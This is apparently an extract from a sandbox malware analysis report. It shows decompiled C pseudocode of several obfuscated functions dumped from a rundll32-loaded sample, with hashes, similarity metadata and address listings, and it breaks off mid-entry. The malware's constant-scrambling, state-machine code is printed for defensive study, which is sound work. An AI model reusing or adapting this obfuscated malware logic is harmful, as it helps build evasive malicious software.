                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: ,
                                                                                                                          • API String ID: 0-2314114710
                                                                                                                          • Opcode ID: 87b68e8b25a5c2f04b065158ac8ad9f442e7e44d23acde0348e24c5cbec69be8
                                                                                                                          • Instruction ID: ddc267cf39e76894258ed361a55de76e8a7d3d41ec78246dd8277eec40d3f885
                                                                                                                          • Opcode Fuzzy Hash: 87b68e8b25a5c2f04b065158ac8ad9f442e7e44d23acde0348e24c5cbec69be8
                                                                                                                          • Instruction Fuzzy Hash: F5E140715083809FD368CF25D58AA0BBBF2BBC5718F608A1DF59A86260C7B5D949CF43
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 100134F0 Relevance: 1.5, APIs: 1, Instructions: 11windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Iconic
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 110040809-0
                                                                                                                          • Opcode ID: c62964fb237a153d00a9d951690d2dc04f1de6fa771c83c35e5bfac844c94462
                                                                                                                          • Instruction ID: 838b9ee9edc54b62b4d2e1430c30368496747ad900502173d0e488298d75c8b4
                                                                                                                          • Opcode Fuzzy Hash: c62964fb237a153d00a9d951690d2dc04f1de6fa771c83c35e5bfac844c94462
                                                                                                                          • Instruction Fuzzy Hash: D6C012B0504208EB8704CB94D940C1977A8E74D30470002CCF80C83300D531AD008655
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 007A9EEC Relevance: 1.5, Strings: 1, Instructions: 226COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 98%
                                                                                                                          			E007A9EEC() {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _t207;
				intOrPtr _t209;
				intOrPtr _t212;
				intOrPtr _t214;
				intOrPtr _t218;
				void* _t219;
				signed int _t221;
				signed int _t222;
				signed int _t223;
				signed int _t224;
				signed int _t225;
				signed int _t257;
				void* _t259;
				char _t263;
				void* _t264;
				void* _t266;

				_v64 = 0xd7ee0e;
				_t257 = 0x22;
				_v64 = _v64 / _t257;
				_v64 = _v64 + 0x89a9;
				_t219 = 0;
				_v64 = _v64 ^ 0x0000b335;
				_t259 = 0xb83ebc6;
				_v96 = 0xf5dfb6;
				_v96 = _v96 >> 6;
				_t221 = 0x26;
				_v96 = _v96 / _t221;
				_t222 = 0x2d;
				_v96 = _v96 * 0x58;
				_v96 = _v96 ^ 0x000b9251;
				_v60 = 0xd70e95;
				_v60 = _v60 >> 9;
				_v60 = _v60 + 0xffffe8b9;
				_v60 = _v60 ^ 0x00062b78;
				_v44 = 0xb641ac;
				_v44 = _v44 / _t222;
				_v44 = _v44 ^ 0x0002d028;
				_v52 = 0xbf8457;
				_t223 = 0x5d;
				_v52 = _v52 / _t223;
				_v52 = _v52 | 0xbb7661a2;
				_v52 = _v52 ^ 0xbb710206;
				_v80 = 0x47b11a;
				_v80 = _v80 ^ 0xc2c4229c;
				_t224 = 0x18;
				_v80 = _v80 / _t224;
				_v80 = _v80 + 0xffff1c96;
				_v80 = _v80 ^ 0x08184a4c;
				_v36 = 0x40dca8;
				_v36 = _v36 + 0x3144;
				_v36 = _v36 ^ 0x004d2780;
				_v40 = 0xec5297;
				_v40 = _v40 * 0x45;
				_v40 = _v40 ^ 0x3fbac2f2;
				_v72 = 0x18b121;
				_v72 = _v72 >> 1;
				_v72 = _v72 * 0x1e;
				_v72 = _v72 + 0xfd79;
				_v72 = _v72 ^ 0x0173ec5f;
				_v76 = 0xd8cc67;
				_v76 = _v76 >> 2;
				_v76 = _v76 >> 0xd;
				_v76 = _v76 * 0x23;
				_v76 = _v76 ^ 0x000d42f3;
				_v88 = 0x5f1bd9;
				_v88 = _v88 + 0x89b3;
				_v88 = _v88 ^ 0xee5f73f3;
				_v88 = _v88 ^ 0xfa82a5ad;
				_v88 = _v88 ^ 0x14801a76;
				_v92 = 0x778c42;
				_t225 = 0x6d;
				_v92 = _v92 * 0x69;
				_v92 = _v92 << 0xb;
				_v92 = _v92 | 0xba472be1;
				_v92 = _v92 ^ 0xfe7d7315;
				_v56 = 0x5dd318;
				_v56 = _v56 / _t257;
				_v56 = _v56 << 0xc;
				_v56 = _v56 ^ 0x2c2721c6;
				_v84 = 0xd870dc;
				_v84 = _v84 >> 0x10;
				_v84 = _v84 | 0x1345b487;
				_v84 = _v84 * 0x5a;
				_v84 = _v84 ^ 0xc68bf031;
				_v48 = 0x9a419e;
				_v48 = _v48 | 0xfa3afde2;
				_v48 = _v48 ^ 0xfabdbed6;
				_v32 = 0x7a1ab;
				_v32 = _v32 / _t225;
				_v32 = _v32 ^ 0x000f5e95;
				_v68 = 0x67bbab;
				_v68 = _v68 + 0xffffccf8;
				_v68 = _v68 ^ 0x5c1ded32;
				_v68 = _v68 << 0xd;
				_v68 = _v68 ^ 0x4cb92f41;
				_t263 = _v28;
				_t258 = _v28;
				goto L1;
				do {
					while(1) {
						L1:
						_t266 = _t259 - 0xc23b37f;
						if(_t266 > 0) {
							break;
						}
						if(_t266 == 0) {
							E007A8519(_v56, _v84, _v24);
							_t259 = 0xdb1153f;
							continue;
						}
						if(_t259 == 0xab8c2) {
							_t209 =  *0x7b3e10; // 0x0
							E00798ECE(_v8 + 1, _t209 + 0x1c, _v12, _v92);
							_t212 =  *0x7b3e10; // 0x0
							_t234 = _v16;
							_t264 = _t264 + 0xc;
							_t219 = 1;
							_t259 = 0xc23b37f;
							 *((intOrPtr*)(_t212 + 0xc)) = _v16;
							continue;
						}
						if(_t259 == 0x26dca52) {
							_t234 = _v96;
							_t214 = E0079A9CE(_v96, _t263,  &_v28, _v60, _v44);
							_t258 = _t214;
							_t264 = _t264 + 0xc;
							if(_t214 == 0) {
								goto L22;
							}
							_t259 = 0xe747a68;
							continue;
						}
						if(_t259 == 0xa9b692f) {
							_t263 = E0079F899(_t234);
							_t259 = 0x26dca52;
							continue;
						}
						if(_t259 != 0xb83ebc6) {
							goto L21;
						} else {
							_t259 = 0xa9b692f;
							continue;
						}
					}
					if(_t259 == 0xdb1153f) {
						E00794E7D(_v48, _v32, _t258, _v68);
						_t259 = 0xdb3b1d3;
						goto L21;
					}
					if(_t259 == 0xe566670) {
						_t207 = E007A894B( &_v16,  &_v24, _v36, _v40, _v72, _v76);
						_t264 = _t264 + 0x10;
						asm("sbb esi, esi");
						_t259 = ( ~_t207 & 0xf3e70543) + 0xc23b37f;
						goto L1;
					}
					if(_t259 != 0xe747a68) {
						goto L21;
					}
					_t259 = 0xdb1153f;
					if(_v28 > 2) {
						_t218 = E00794346( &_v20, _v52,  *((intOrPtr*)(_t258 + 8)), _v80);
						_v24 = _t218;
						_pop(_t234);
						if(_t218 != 0) {
							_t259 = 0xe566670;
						}
					}
					goto L1;
					L21:
				} while (_t259 != 0xdb3b1d3);
				L22:
				return _t219;
			}










































                                                                                                                          0x007a9eef
                                                                                                                          0x007a9f03
                                                                                                                          0x007a9f08
                                                                                                                          0x007a9f0e
                                                                                                                          0x007a9f16
                                                                                                                          0x007a9f18
                                                                                                                          0x007a9f20
                                                                                                                          0x007a9f25
                                                                                                                          0x007a9f2d
                                                                                                                          0x007a9f36
                                                                                                                          0x007a9f3b
                                                                                                                          0x007a9f46
                                                                                                                          0x007a9f49
                                                                                                                          0x007a9f4d
                                                                                                                          0x007a9f55
                                                                                                                          0x007a9f5d
                                                                                                                          0x007a9f62
                                                                                                                          0x007a9f6a
                                                                                                                          0x007a9f72
                                                                                                                          0x007a9f82
                                                                                                                          0x007a9f86
                                                                                                                          0x007a9f8e
                                                                                                                          0x007a9f9a
                                                                                                                          0x007a9f9f
                                                                                                                          0x007a9fa5
                                                                                                                          0x007a9fad
                                                                                                                          0x007a9fb5
                                                                                                                          0x007a9fbd
                                                                                                                          0x007a9fc9
                                                                                                                          0x007a9fcc
                                                                                                                          0x007a9fd0
                                                                                                                          0x007a9fd8
                                                                                                                          0x007a9fe0
                                                                                                                          0x007a9fe8
                                                                                                                          0x007a9ff0
                                                                                                                          0x007a9ff8
                                                                                                                          0x007aa005
                                                                                                                          0x007aa009
                                                                                                                          0x007aa011
                                                                                                                          0x007aa019
                                                                                                                          0x007aa022
                                                                                                                          0x007aa026
                                                                                                                          0x007aa02e
                                                                                                                          0x007aa036
                                                                                                                          0x007aa03e
                                                                                                                          0x007aa043
                                                                                                                          0x007aa04d
                                                                                                                          0x007aa051
                                                                                                                          0x007aa059
                                                                                                                          0x007aa061
                                                                                                                          0x007aa069
                                                                                                                          0x007aa071
                                                                                                                          0x007aa079
                                                                                                                          0x007aa081
                                                                                                                          0x007aa092
                                                                                                                          0x007aa093
                                                                                                                          0x007aa097
                                                                                                                          0x007aa09c
                                                                                                                          0x007aa0a4
                                                                                                                          0x007aa0ac
                                                                                                                          0x007aa0bc
                                                                                                                          0x007aa0c0
                                                                                                                          0x007aa0c5
                                                                                                                          0x007aa0cd
                                                                                                                          0x007aa0d5
                                                                                                                          0x007aa0da
                                                                                                                          0x007aa0e7
                                                                                                                          0x007aa0eb
                                                                                                                          0x007aa0f3
                                                                                                                          0x007aa0fb
                                                                                                                          0x007aa103
                                                                                                                          0x007aa10b
                                                                                                                          0x007aa119
                                                                                                                          0x007aa11d
                                                                                                                          0x007aa125
                                                                                                                          0x007aa12d
                                                                                                                          0x007aa135
                                                                                                                          0x007aa13d
                                                                                                                          0x007aa142
                                                                                                                          0x007aa14a
                                                                                                                          0x007aa14e
                                                                                                                          0x007aa14e
                                                                                                                          0x007aa152
                                                                                                                          0x007aa152
                                                                                                                          0x007aa152
                                                                                                                          0x007aa152
                                                                                                                          0x007aa158
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007aa15e
                                                                                                                          0x007aa216
                                                                                                                          0x007aa21c
                                                                                                                          0x00000000
                                                                                                                          0x007aa21c
                                                                                                                          0x007aa16a
                                                                                                                          0x007aa1d5
                                                                                                                          0x007aa1e9
                                                                                                                          0x007aa1ee
                                                                                                                          0x007aa1f5
                                                                                                                          0x007aa1f9
                                                                                                                          0x007aa1fc
                                                                                                                          0x007aa1fd
                                                                                                                          0x007aa202
                                                                                                                          0x00000000
                                                                                                                          0x007aa202
                                                                                                                          0x007aa172
                                                                                                                          0x007aa1af
                                                                                                                          0x007aa1b4
                                                                                                                          0x007aa1b9
                                                                                                                          0x007aa1bb
                                                                                                                          0x007aa1c0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007aa1c6
                                                                                                                          0x00000000
                                                                                                                          0x007aa1c6
                                                                                                                          0x007aa17a
                                                                                                                          0x007aa198
                                                                                                                          0x007aa19a
                                                                                                                          0x00000000
                                                                                                                          0x007aa19a
                                                                                                                          0x007aa182
                                                                                                                          0x00000000
                                                                                                                          0x007aa188
                                                                                                                          0x007aa188
                                                                                                                          0x00000000
                                                                                                                          0x007aa188
                                                                                                                          0x007aa182
                                                                                                                          0x007aa22c
                                                                                                                          0x007aa2c6
                                                                                                                          0x007aa2cd
                                                                                                                          0x00000000
                                                                                                                          0x007aa2cd
                                                                                                                          0x007aa238
                                                                                                                          0x007aa29a
                                                                                                                          0x007aa29f
                                                                                                                          0x007aa2a6
                                                                                                                          0x007aa2ae
                                                                                                                          0x00000000
                                                                                                                          0x007aa2ae
                                                                                                                          0x007aa240
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007aa24b
                                                                                                                          0x007aa250
                                                                                                                          0x007aa265
                                                                                                                          0x007aa26a
                                                                                                                          0x007aa26f
                                                                                                                          0x007aa272
                                                                                                                          0x007aa278
                                                                                                                          0x007aa278
                                                                                                                          0x007aa272
                                                                                                                          0x00000000
                                                                                                                          0x007aa2d2
                                                                                                                          0x007aa2d2
                                                                                                                          0x007aa2e1
                                                                                                                          0x007aa2e7

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: D1
                                                                                                                          • API String ID: 0-2215811268
                                                                                                                          • Opcode ID: 39b04d9c761a6ec58368feb7e713a1010327504967a592c838574e40511ce2d5
                                                                                                                          • Instruction ID: 789d9859fd5095698768dc57fef179c89403820ca0d78e1dbfc809faffab4bae
                                                                                                                          • Opcode Fuzzy Hash: 39b04d9c761a6ec58368feb7e713a1010327504967a592c838574e40511ce2d5
                                                                                                                          • Instruction Fuzzy Hash: 67A142729083019FC758CF65C48940BBBF1BBC5354F148A2EF5A996260D7B9CA49CF87
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 007ABB23 Relevance: 1.4, Strings: 1, Instructions: 173COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 86%
                                                                                                                          			E007ABB23(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v12;
				intOrPtr _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				unsigned int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				void* _t138;
				intOrPtr _t161;
				void* _t162;
				void* _t164;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				void* _t185;
				signed int* _t189;

				_t162 = __ecx;
				_push(1);
				_push(1);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E007A20B9(_t138);
				_v16 = 0xdfc885;
				_t189 =  &(( &_v76)[8]);
				asm("stosd");
				_t185 = 0;
				_t164 = 0xcc97672;
				asm("stosd");
				asm("stosd");
				_v32 = 0x60c2fa;
				_v32 = _v32 >> 3;
				_v32 = _v32 ^ 0x00046f58;
				_v76 = 0xb548f0;
				_v76 = _v76 >> 0xc;
				_t181 = 0xc;
				_v76 = _v76 * 0x3c;
				_v76 = _v76 + 0xffff64d0;
				_v76 = _v76 ^ 0x0001fd54;
				_v52 = 0x15927a;
				_v52 = _v52 / _t181;
				_v52 = _v52 ^ 0x000151ae;
				_v56 = 0xd6ed9;
				_t182 = 0x1a;
				_v56 = _v56 * 0x3f;
				_v56 = _v56 + 0xfffffbb4;
				_v56 = _v56 ^ 0x0345d46e;
				_v64 = 0xba2b53;
				_v64 = _v64 * 0x6d;
				_v64 = _v64 ^ 0x73d6d9cf;
				_v64 = _v64 * 0x31;
				_v64 = _v64 ^ 0x981330b4;
				_v60 = 0x269f8;
				_v60 = _v60 >> 5;
				_v60 = _v60 + 0xffffb859;
				_v60 = _v60 ^ 0xfff00afd;
				_v68 = 0xfd9147;
				_v68 = _v68 ^ 0x8de1643f;
				_v68 = _v68 / _t182;
				_v68 = _v68 >> 0xf;
				_v68 = _v68 ^ 0x000df039;
				_v72 = 0x5def36;
				_v72 = _v72 | 0xd620e1c7;
				_v72 = _v72 + 0xd307;
				_t183 = 0x48;
				_v72 = _v72 / _t183;
				_v72 = _v72 ^ 0x02f0e4dc;
				_v24 = 0xf7704c;
				_v24 = _v24 + 0x27dd;
				_v24 = _v24 ^ 0x00ff74b2;
				_v28 = 0x151ed9;
				_v28 = _v28 * 0x48;
				_v28 = _v28 ^ 0x05f046e2;
				_v36 = 0xddc4df;
				_v36 = _v36 >> 0xf;
				_v36 = _v36 | 0x7f83127d;
				_v36 = _v36 ^ 0x7f8e5ab1;
				_v40 = 0x29fd7f;
				_v40 = _v40 >> 7;
				_v40 = _v40 | 0x8d3b2756;
				_v40 = _v40 ^ 0x8d37b79a;
				_v44 = 0x8dc5a8;
				_v44 = _v44 * 0x63;
				_v44 = _v44 >> 4;
				_v44 = _v44 ^ 0x036b3557;
				_v48 = 0xd61f7e;
				_v48 = _v48 | 0xd43d52c3;
				_v48 = _v48 + 0xa376;
				_v48 = _v48 ^ 0xd504b7b0;
				_t184 = _v20;
				while(_t164 != 0x2524be6) {
					if(_t164 == 0xcc97672) {
						_t164 = 0xe41debb;
						continue;
					} else {
						if(_t164 == 0xdd773d9) {
							if(E007AD8EC(_v52, _v56,  &_v20, _t184) != 0) {
								_t164 = 0xe01b1ec;
								continue;
							}
						} else {
							if(_t164 == 0xe01b1ec) {
								E007B0AC8(_v64, _v60, 1, _v68, _v20, _v72, _a12, _t162, _v24, 1, _t164, _v28);
								_t189 =  &(_t189[0xa]);
								_t164 = 0x2524be6;
								_t185 =  !=  ? 1 : _t185;
								continue;
							} else {
								if(_t164 != 0xe41debb) {
									L13:
									if(_t164 != 0x78a313b) {
										continue;
									}
								} else {
									_t161 = E00793DE2(_t164);
									_t184 = _t161;
									if(_t161 != 0xffffffff) {
										_t164 = 0xdd773d9;
										continue;
									}
								}
							}
						}
					}
					return _t185;
				}
				E007A1E67(_v36, _v40, _v44, _v48, _v20);
				_t189 =  &(_t189[3]);
				_t164 = 0x78a313b;
				goto L13;
			}





























                                                                                                                          0x007abb2c
                                                                                                                          0x007abb2f
                                                                                                                          0x007abb30
                                                                                                                          0x007abb31
                                                                                                                          0x007abb35
                                                                                                                          0x007abb39
                                                                                                                          0x007abb3d
                                                                                                                          0x007abb41
                                                                                                                          0x007abb42
                                                                                                                          0x007abb43
                                                                                                                          0x007abb48
                                                                                                                          0x007abb56
                                                                                                                          0x007abb59
                                                                                                                          0x007abb5c
                                                                                                                          0x007abb5e
                                                                                                                          0x007abb65
                                                                                                                          0x007abb66
                                                                                                                          0x007abb67
                                                                                                                          0x007abb6f
                                                                                                                          0x007abb74
                                                                                                                          0x007abb7c
                                                                                                                          0x007abb84
                                                                                                                          0x007abb8e
                                                                                                                          0x007abb91
                                                                                                                          0x007abb95
                                                                                                                          0x007abb9d
                                                                                                                          0x007abba5
                                                                                                                          0x007abbbd
                                                                                                                          0x007abbc1
                                                                                                                          0x007abbc9
                                                                                                                          0x007abbd6
                                                                                                                          0x007abbd9
                                                                                                                          0x007abbdd
                                                                                                                          0x007abbe5
                                                                                                                          0x007abbed
                                                                                                                          0x007abbfa
                                                                                                                          0x007abbfe
                                                                                                                          0x007abc0b
                                                                                                                          0x007abc0f
                                                                                                                          0x007abc17
                                                                                                                          0x007abc1f
                                                                                                                          0x007abc24
                                                                                                                          0x007abc2c
                                                                                                                          0x007abc34
                                                                                                                          0x007abc3c
                                                                                                                          0x007abc4c
                                                                                                                          0x007abc50
                                                                                                                          0x007abc55
                                                                                                                          0x007abc5d
                                                                                                                          0x007abc65
                                                                                                                          0x007abc6d
                                                                                                                          0x007abc79
                                                                                                                          0x007abc7c
                                                                                                                          0x007abc80
                                                                                                                          0x007abc88
                                                                                                                          0x007abc90
                                                                                                                          0x007abc98
                                                                                                                          0x007abca0
                                                                                                                          0x007abcad
                                                                                                                          0x007abcb1
                                                                                                                          0x007abcb9
                                                                                                                          0x007abcc1
                                                                                                                          0x007abcc6
                                                                                                                          0x007abcce
                                                                                                                          0x007abcd6
                                                                                                                          0x007abcde
                                                                                                                          0x007abce3
                                                                                                                          0x007abceb
                                                                                                                          0x007abcf3
                                                                                                                          0x007abd00
                                                                                                                          0x007abd04
                                                                                                                          0x007abd09
                                                                                                                          0x007abd11
                                                                                                                          0x007abd19
                                                                                                                          0x007abd21
                                                                                                                          0x007abd29
                                                                                                                          0x007abd31
                                                                                                                          0x007abd35
                                                                                                                          0x007abd47
                                                                                                                          0x007abde6
                                                                                                                          0x00000000
                                                                                                                          0x007abd4d
                                                                                                                          0x007abd53
                                                                                                                          0x007abdda
                                                                                                                          0x007abddc
                                                                                                                          0x00000000
                                                                                                                          0x007abddc
                                                                                                                          0x007abd55
                                                                                                                          0x007abd5b
                                                                                                                          0x007abdac
                                                                                                                          0x007abdb1
                                                                                                                          0x007abdb4
                                                                                                                          0x007abdbb
                                                                                                                          0x00000000
                                                                                                                          0x007abd5d
                                                                                                                          0x007abd63
                                                                                                                          0x007abe11
                                                                                                                          0x007abe17
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007abd69
                                                                                                                          0x007abd71
                                                                                                                          0x007abd76
                                                                                                                          0x007abd7b
                                                                                                                          0x007abd81
                                                                                                                          0x00000000
                                                                                                                          0x007abd81
                                                                                                                          0x007abd7b
                                                                                                                          0x007abd63
                                                                                                                          0x007abd5b
                                                                                                                          0x007abd53
                                                                                                                          0x007abe26
                                                                                                                          0x007abe26
                                                                                                                          0x007abe04
                                                                                                                          0x007abe09
                                                                                                                          0x007abe0c
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 6]
                                                                                                                          • API String ID: 0-3974934468
                                                                                                                          • Opcode ID: 02ce66d0ac1312b45417b61cb3151e0e53b916cf6161079afb78e77aaf59e863
                                                                                                                          • Instruction ID: 18b50886841df4f1567ee324128897c9f2588c928b12f8af68996f1526e724f8
                                                                                                                          • Opcode Fuzzy Hash: 02ce66d0ac1312b45417b61cb3151e0e53b916cf6161079afb78e77aaf59e863
                                                                                                                          • Instruction Fuzzy Hash: 67713071208341AFC358CF25C88941BBBE1FFCA758F504A1DF69696261C376CA498F43
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00795361 Relevance: 1.4, Strings: 1, Instructions: 124COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 91%
                                                                                                                          			E00795361(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				unsigned int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				unsigned int _v32;
				void* __edx;
				void* _t84;
				void* _t104;
				void* _t118;
				signed int _t120;
				signed int _t121;
				signed int _t122;
				void* _t124;
				signed int* _t127;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E007A20B9(_t84);
				_v4 = 0x18047d;
				_t127 =  &(( &_v32)[5]);
				_v4 = _v4 >> 0xa;
				_v4 = _v4 ^ 0x000d3248;
				_t124 = 0;
				_v28 = 0x90acd4;
				_t104 = 0x35df4ed;
				_v28 = _v28 >> 5;
				_v28 = _v28 + 0xffff3107;
				_v28 = _v28 | 0xd0f9b279;
				_v28 = _v28 ^ 0xd0f1daef;
				_v8 = 0x9d14b7;
				_v8 = _v8 << 2;
				_v8 = _v8 ^ 0x027823b1;
				_v32 = 0xfd6947;
				_v32 = _v32 + 0xffff03bf;
				_t120 = 0x72;
				_v32 = _v32 / _t120;
				_v32 = _v32 >> 0xa;
				_v32 = _v32 ^ 0x00066e44;
				_v16 = 0x111da;
				_v16 = _v16 ^ 0xdd7c73d4;
				_v16 = _v16 | 0x7d37165e;
				_v16 = _v16 ^ 0xfd769a76;
				_v12 = 0x2531de;
				_v12 = _v12 << 0xd;
				_v12 = _v12 ^ 0xa63e9142;
				_v20 = 0x6e0002;
				_v20 = _v20 >> 0xe;
				_t121 = 0xe;
				_v20 = _v20 / _t121;
				_t122 = 0x3d;
				_v20 = _v20 * 0x64;
				_v20 = _v20 ^ 0x000bef19;
				_v24 = 0xa3fc95;
				_v24 = _v24 + 0xdcd1;
				_v24 = _v24 << 3;
				_v24 = _v24 / _t122;
				_v24 = _v24 ^ 0x0013a2ec;
				while(_t104 != 0x311781) {
					if(_t104 == 0x35df4ed) {
						_push(_t104);
						_push(_t104);
						_t118 = 0x28;
						 *0x7b3e08 = E00797FF2(_t118);
						_t104 = 0x605992c;
						continue;
					} else {
						if(_t104 == 0x477ef52) {
							E0079924B();
							_t104 = 0x311781;
							continue;
						} else {
							if(_t104 == 0x605992c) {
								if(E007B0F33() != 0) {
									_t104 = 0xdb1ba22;
									continue;
								}
							} else {
								if(_t104 != 0xdb1ba22) {
									L13:
									if(_t104 != 0x5723dc8) {
										continue;
									}
								} else {
									_t124 = E0079960D(_v16, _a12, _a8, _v12);
									_t127 =  &(_t127[3]);
									if(_t124 == 0) {
										_t104 = 0x477ef52;
										continue;
									}
								}
							}
						}
					}
					return _t124;
				}
				E007A8519(_v20, _v24,  *0x7b3e08);
				_t104 = 0x5723dc8;
				goto L13;
			}




















                                                                                                                          0x00795368
                                                                                                                          0x0079536c
                                                                                                                          0x00795370
                                                                                                                          0x00795376
                                                                                                                          0x0079537b
                                                                                                                          0x00795383
                                                                                                                          0x00795386
                                                                                                                          0x0079538d
                                                                                                                          0x00795395
                                                                                                                          0x00795397
                                                                                                                          0x0079539f
                                                                                                                          0x007953a4
                                                                                                                          0x007953ae
                                                                                                                          0x007953bb
                                                                                                                          0x007953c3
                                                                                                                          0x007953cb
                                                                                                                          0x007953d3
                                                                                                                          0x007953d8
                                                                                                                          0x007953e0
                                                                                                                          0x007953e8
                                                                                                                          0x007953f6
                                                                                                                          0x007953fb
                                                                                                                          0x00795401
                                                                                                                          0x00795406
                                                                                                                          0x0079540e
                                                                                                                          0x00795416
                                                                                                                          0x0079541e
                                                                                                                          0x00795426
                                                                                                                          0x0079542e
                                                                                                                          0x00795436
                                                                                                                          0x0079543b
                                                                                                                          0x00795443
                                                                                                                          0x0079544b
                                                                                                                          0x00795454
                                                                                                                          0x00795459
                                                                                                                          0x00795464
                                                                                                                          0x00795465
                                                                                                                          0x00795469
                                                                                                                          0x00795471
                                                                                                                          0x00795479
                                                                                                                          0x00795481
                                                                                                                          0x00795491
                                                                                                                          0x00795495
                                                                                                                          0x0079549d
                                                                                                                          0x007954a7
                                                                                                                          0x00795501
                                                                                                                          0x00795502
                                                                                                                          0x00795505
                                                                                                                          0x0079550d
                                                                                                                          0x00795512
                                                                                                                          0x00000000
                                                                                                                          0x007954a9
                                                                                                                          0x007954ab
                                                                                                                          0x007954ec
                                                                                                                          0x007954f1
                                                                                                                          0x00000000
                                                                                                                          0x007954ad
                                                                                                                          0x007954b3
                                                                                                                          0x007954e6
                                                                                                                          0x007954e8
                                                                                                                          0x00000000
                                                                                                                          0x007954e8
                                                                                                                          0x007954b5
                                                                                                                          0x007954b7
                                                                                                                          0x00795532
                                                                                                                          0x00795538
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007954b9
                                                                                                                          0x007954d2
                                                                                                                          0x007954d4
                                                                                                                          0x007954d9
                                                                                                                          0x007954db
                                                                                                                          0x00000000
                                                                                                                          0x007954db
                                                                                                                          0x007954d9
                                                                                                                          0x007954b7
                                                                                                                          0x007954b3
                                                                                                                          0x007954ab
                                                                                                                          0x00795547
                                                                                                                          0x00795547
                                                                                                                          0x00795527
                                                                                                                          0x0079552d
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: H2
                                                                                                                          • API String ID: 0-302591398
